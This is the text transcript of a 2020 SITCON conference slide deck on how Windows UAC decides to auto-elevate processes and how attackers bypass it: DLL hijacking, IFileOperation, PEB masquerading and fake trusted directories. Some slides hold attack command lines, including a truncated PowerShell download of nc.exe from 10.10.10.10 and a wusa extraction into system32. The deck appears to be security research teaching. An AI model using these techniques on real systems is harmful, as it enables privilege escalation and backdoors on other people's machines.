SITCON: Playing Win32 Like a K!NG ;)

229b1596ce57cd0935a2bacd410d87a0?s=47 adr
August 08, 2020

SITCON: Playing Win32 Like a K!NG ;)

在 Windows Vista 後作業系統內置了 UAC(User Account Control)防護,本來應被視為其中一項相當重要的惡意程式防護、替我們擋下未知的惡意程式做出的惡意手段。然而現實慘狀卻告訴我們:UAC 服務只是一個惱人要求使用者同意的彈窗設計、而未能擋下數不盡的惡意程式攻擊。

在這場議程中,將簡介微軟在 Windows 上防護體系的馬其諾防線、Win32 Process 裝載特性、逆向工程分析 UAC 實作細節、微軟設計 UAC 時作出的安全考量假設 與 各個大神是怎麼玩爆你的 UAC 防護的。

sysDoor: gist.github.com/aaaddress1/6c4276155104a5b7df9ab15221c91f69

229b1596ce57cd0935a2bacd410d87a0?s=128

adr

August 08, 2020
Tweet

Transcript

  1. 2020 (New-Object System.Net.WebClient).Dow /10.10.10.10/nc.exe","nc.ex PS C:\> [System.Convert]::ToBase64Strin ext.Encoding]::UTF8.Ge 414141414141414141 AAAAAAAAAA

    SITCON cmd.exe /c "d Playing Win32 Like a K!NG ;) aaaddress1@chroot.org
  2. #Windows #Reversing #Pwn #Exploit $man • Master degree at CSIE,

    NTUST • Security Researcher - chrO.ot • Speaker - BlackHat, DEFCON, VXCON, HITCON • aaaddress1@chroot.org • Hao's Arsenal
  3. aaaddress1@chroot.org 1. UAC Design 2. Exploit Attacks 1. Misc Method

    2. CIA Vault7: Elevated COM Object Method 3. UAC Bypass by Mocking Trusted Directories 3. Recap /?outline
  4. aaaddress1@chroot.org 〉〉〉UAC Design

  5. aaaddress1@chroot.org /?UAC

  6. aaaddress1@chroot.org /?UAC

  7. syscall Ring0 Ring3 Explorer (A.) RunAs UAC Service (B.) Send

    a task by RPC message to UAC service for creating a different privilege child process RPC trust_authA consent.exe privileged child process trust_authB
  8. aaaddress1@chroot.org • TrustAuth_A # trust path verify - $p =

    ToDosName("C:\\a.exe") # \??\C:\a.exe - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64) - deny-list /?auth_a
  9. aaaddress1@chroot.org • TrustAuth_B - whitelisted *.exe with M$ signature -

    or AutoElevate marked as TRUE in manifest.xml /?auth_b
  10. aaaddress1@chroot.org /?Bypass • UAC: 朕不給的,你拿不⾛! • TrustAuth_A # binary from

    the trusted zone? A. launched from the system directory B. whitelisted + signed by M$ • TrustAuth_B # should be elevated? C. marked as auto-elevated or whitelisted PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe 所以現在... 我們有⼀份 好棒棒⽬標名單
  11. aaaddress1@chroot.org • Misc: 在野奇技淫巧系列✨ • CIA: Elevated COM Object Method

    • Mocking Trusted Directories /?attack
  12. aaaddress1@chroot.org /?misc#1 Accessing Access Tokens for UIAccess www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html 幫你⾃動按確定︖ 舉⼿之勞啦

  13. aaaddress1@chroot.org /?misc#2 • 那我們能讓⾼權服務直接呼叫我們嗎 • Bypassing UAC on Windows10 using

    Disk Cleanup enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup
  14. aaaddress1@chroot.org /?misc#3 • 解壓縮直接把系統程式檔案蓋掉 $ wusa hack.cab /extract: C:\windows\system32 msitpros.com/?p=3100

  15. aaaddress1@chroot.org 〉〉〉IFileOperation

  16. aaaddress1@chroot.org /?RunAs consent.exe

  17. aaaddress1@chroot.org /?fileCopy

  18. aaaddress1@chroot.org /?alert

  19. aaaddress1@chroot.org 'PE' Opt Header .text .EntryPoint .ImageBase Section Data .rdata

    .idata a.exe Process PEB PE Module ntdll.dll VERSION.dll user32.dll ... LoadLibrary() $PATH: { "C:\hijack\VERSION.dll", "C:\Windows\System32\VERSION.dll", "C:\Windows\SysWoW64\VERSION.dll", ... } C:\hijack\a.exe /?hijack
  20. aaaddress1@chroot.org • DLL Side-Loading → to hijack auto-elevated windows services

    by drop a malicious *.dll binary • IFileOperation → file arbitrary writing if you're Explorer → drop *.dll into C:\windows\system32 to hijack • DLL Injection → do things as Explorer https://github.com/hjc4869/UacBypass /?bypass#1
  21. malware system32\cliconfg.exe /?bypass#1 explorer.exe Process ntdll.dll kernel32.dll user32.dll malware.dll (a.)

    inject *.dll module (b.) create a new thread to wake malware up (c.) drop a *.dll into %system32% to hijack service (d.) get privileged by dll hijack
  22. aaaddress1@chroot.org • 更動 Windows 註冊序號 →駭客可以幫你安裝正版的 Windows! • 執⾏磁碟管理⼯具 →電腦跑很慢電腦垃圾太多︖駭客幫你磁碟重整⼀下

    • 幫你移除防毒軟體 →覺得防毒讓電腦跑很慢︖沒關係駭客幫你刪掉 (⁎⁍̴̛ᴗ⁍̴̛⁎) • 寫入開機啟動項 →駭客可以植入開機⾃動執⾏的後⾨ watch after you ;) /?bypass4what
  23. aaaddress1@chroot.org 'PE' Opt Header .text .EntryPoint .ImageBase Section Data .rdata

    .idata Source.cpp Compiler 'MZ' Opt Header ImageBase .text .rdata .idata Process Application Loader EntryPoint PEB "C:\Windows\explorer.exe" PE Module /?MasqueradePEB
  24. aaaddress1@chroot.org • DLL Side-Loading → to hijack auto-elevated windows services

    by drop a malicious *.dll binary • IFileOperation + MasqueradePEB → file arbitrary writing as Explorer → drop *.dll into C:\windows\system32 to hijack /?bypass#2
  25. malware system32\cliconfg.exe /?bypass#1 explorer.exe Process ntdll.dll kernel32.dll user32.dll malware.dll (a.)

    inject *.dll module (b.) create a new thread to wake malware up (c.) drop a *.dll into %system32% to hijack service (d.) get privileged by dll hijack
  26. system32\cliconfg.exe /?bypass#2 malware.exe Process ntdll.dll kernel32.dll user32.dll (a.) Masquerade current

    path as explorer.exe (b.) drop a *.dll into %system32% to hijack service (c.) get privileged by dll hijack PEB "C:\Windows\explorer.exe"
  27. aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html

  28. aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

  29. aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

  30. aaaddress1@chroot.org /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-⽅法研究/

  31. aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html M$

    patched this vulnerability after Win10 version 1607 (include known *.dll lead to hijack)
  32. aaaddress1@chroot.org Vault 7: CIA Hacking Tools Revealed /?WikiLeaks wikileaks.org/ciav7p1/cms/page_3375231.html M$

    patched this vulnerability after Win10 version 1607 (include known *.dll lead to hijack)
  33. aaaddress1@chroot.org 〉〉〉Mocking Directory

  34. syscall Ring0 Ring3 Explorer (A.) RunAs UAC Service (B.) Send

    a task by RPC message to UAC service for creating a different privilege child process RPC trust_authA consent.exe privileged child process trust_authB
  35. aaaddress1@chroot.org /?Bypass • UAC: 朕不給的,你拿不⾛! • TrustAuth_A # binary from

    the trusted zone? A. launched from the system directory B. whitelisted + signed by M$ • TrustAuth_B # should be elevated? C. marked as auto-elevated or whitelisted PS C:> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe 所以現在... 我們有⼀份 好棒棒⽬標名單
  36. aaaddress1@chroot.org /?DACL

  37. aaaddress1@chroot.org /?DACL

  38. aaaddress1@chroot.org $ mkdir "C:\Windows \" $ mkdir "C:\Windows \System32" /?DACL

  39. aaaddress1@chroot.org • TrustAuth_A # trust path verify - $p =

    ToDosName("C:\\a.exe") # \??\C:\a.exe - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64) - deny-list /?auth_a
  40. aaaddress1@chroot.org RtlDosPathNameToRelativeNtPathName_U_WithStatus( GetLongPathNameW(L"C:\Windows \System32\a.exe") ) RtlDosPathNameToRelativeNtPathName_U_WithStatus( L"C:\Windows\System32\a.exe" ) $p =

    L"\??\C:\Windows\System32\a.exe" /?auth_a AiLaunchProcess(L"C:\Windows \System32\a.exe")
  41. aaaddress1@chroot.org • TrustAuth_A - Path Normalization Issues • TrustAuth_B -

    Whitelisted EXE Files with Trusted Signature - AutoElevated Marked EXE Files → DLL Side-Loading Tricks to hijack windows services • UAC Bypass by Mocking Trusted Directories /?attack
  42. aaaddress1@chroot.org 〉〉〉Recap

  43. aaaddress1@chroot.org /?HITCON www.youtube.com/watch?v=6LUo-Crd9pc

  44. aaaddress1@chroot.org • UAC Design - auth_a: *.exe launched from the

    system - auth_b: marked as AutoElevated • Bypass Tricks - Issue: IFileOperation, Path Normalization - DLL Side-Loading - Code Inject / MasqueradePEB - DEFCON 25: UAC 0day, all day! by @FuzzySec /?recap
  45. aaaddress1@chroot.org /?HITCON

  46. 萬 ⽤ 劫 持 本 地 提 权 情報滲透 越

    級 注 入 PS C:\> [System.Convert]::ToBase64String([Sy ext.Encoding]::UTF8.GetByte cmd.exe /c "dir" 414141414141414141 AAAAAAAAAAAAAAAAAAAAAA aaaddress1@chroot.org 遠程後⾨ 網軍⾏動 Thanks! Slide Github @aaaddress1 Facebook